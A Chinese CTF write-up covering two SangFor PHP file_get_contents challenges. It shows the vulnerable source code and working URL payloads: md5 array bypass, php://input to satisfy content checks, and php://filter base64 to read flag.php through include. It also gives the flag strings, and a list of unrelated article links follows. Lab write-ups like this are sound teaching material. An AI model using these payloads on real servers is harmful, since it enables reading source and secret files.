PHP-file_get_contents(练习1)

[题目信息]:

题目名称 题目难度
PHP-file_get_contents(练习1) 1

[题目考点]:

file_get_contents() 把整个文件读入一个字符串中。
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。

[Flag格式]:

SangFor{31vKQPZ2RuYLWyuwBEOZyoylVTeH9G9h}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:2091

[题目writeup]:

1、实验主页

2、源码分析

<?php
$p1 = @$_GET['a'];
$p2 = @$_GET['b'];
$p3 = @$_GET['c'];
$p4 = @$_GET['d'];
if(isset($_GET['a']) && isset($_GET['b']) && isset($_GET['c']) && isset($_GET['d']))
    if($p1 != $p2 && md5($p1) == md5($p2)){
        if($p3 === file_get_contents($p4)){
            echo file_get_contents("flag.php");
        }
    }
    else{
        die("请输入2个不同的值");
    }
highlight_file("index.php"); 

Payload:

/?a[]=1&b[]=2&c=4&d=php://input
post:
4








[题目信息]:

题目名称 题目难度
PHP-file_get_contents 1

[题目考点]:

file_get_contents() 把整个文件读入一个字符串中。
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。

[Flag格式]:

SangFor{jfbcGax7p5Uzgu3q}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:2014

[题目writeup]:

1、实验主页

2、源码分析

<?php
error_reporting(0);
function check($file){
    $black=array("../", "..\\");
    foreach($black as $value){
        if(strstr($file, $value)){
            die("得了吧");
        }
    }

}
header("set-cookie: sourceCode.txt");
$user = $_GET["name"];
$file = $_GET["file"];

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the SangFor")){
echo "hello admin!<br>";
check($file);
include($file);
}
else {
echo "you are not admin ! ";
}
?>

根据源码存在两个变量,user和file。

在if条件判断中,传入一个文件且其内容为welcome to the SangFor,才可以进入判断进行下一步。

file_get_contents() 函数把整个文件读入一个字符串中。

file_get_contents()的$filename参数不仅仅为本地文件路径,还可以是一个网络路径URL。于是便可以利用伪协议:

?name=php://input
POST:
welcome to the SangFor

进入if判断有执行到包含函数,则可以使用伪协议读取目标文件

/?name=php://input&file=php://filter/read=convert.base64-encode/resource=flag.php
POST:
welcome to the SangFor
相关推荐
杨荧5 分钟前
【JAVA毕业设计】基于Vue和SpringBoot的宠物咖啡馆平台
java·开发语言·jvm·vue.js·spring boot·spring cloud·开源
monkey_meng18 分钟前
【Rust中的项目管理】
开发语言·rust·源代码管理
喜欢打篮球的普通人19 分钟前
rust高级特征
开发语言·后端·rust
Ling_suu36 分钟前
Spring——单元测试
java·spring·单元测试
ModelBulider37 分钟前
十三、注解配置SpringMVC
java·开发语言·数据库·sql·mysql
V搜xhliang02461 小时前
基于深度学习的地物类型的提取
开发语言·人工智能·python·深度学习·神经网络·学习·conda
DK七七1 小时前
多端校园圈子论坛小程序,多个学校同时代理,校园小程序分展示后台管理源码
开发语言·前端·微信小程序·小程序·php
苹果酱05671 小时前
C语言 char 字符串 - C语言零基础入门教程
java·开发语言·spring boot·mysql·中间件
csucoderlee1 小时前
eclipse mat leak suspects report和 component report的区别
java·ide·eclipse
代码小鑫1 小时前
A032-基于Spring Boot的健康医院门诊在线挂号系统
java·开发语言·spring boot·后端·spring·毕业设计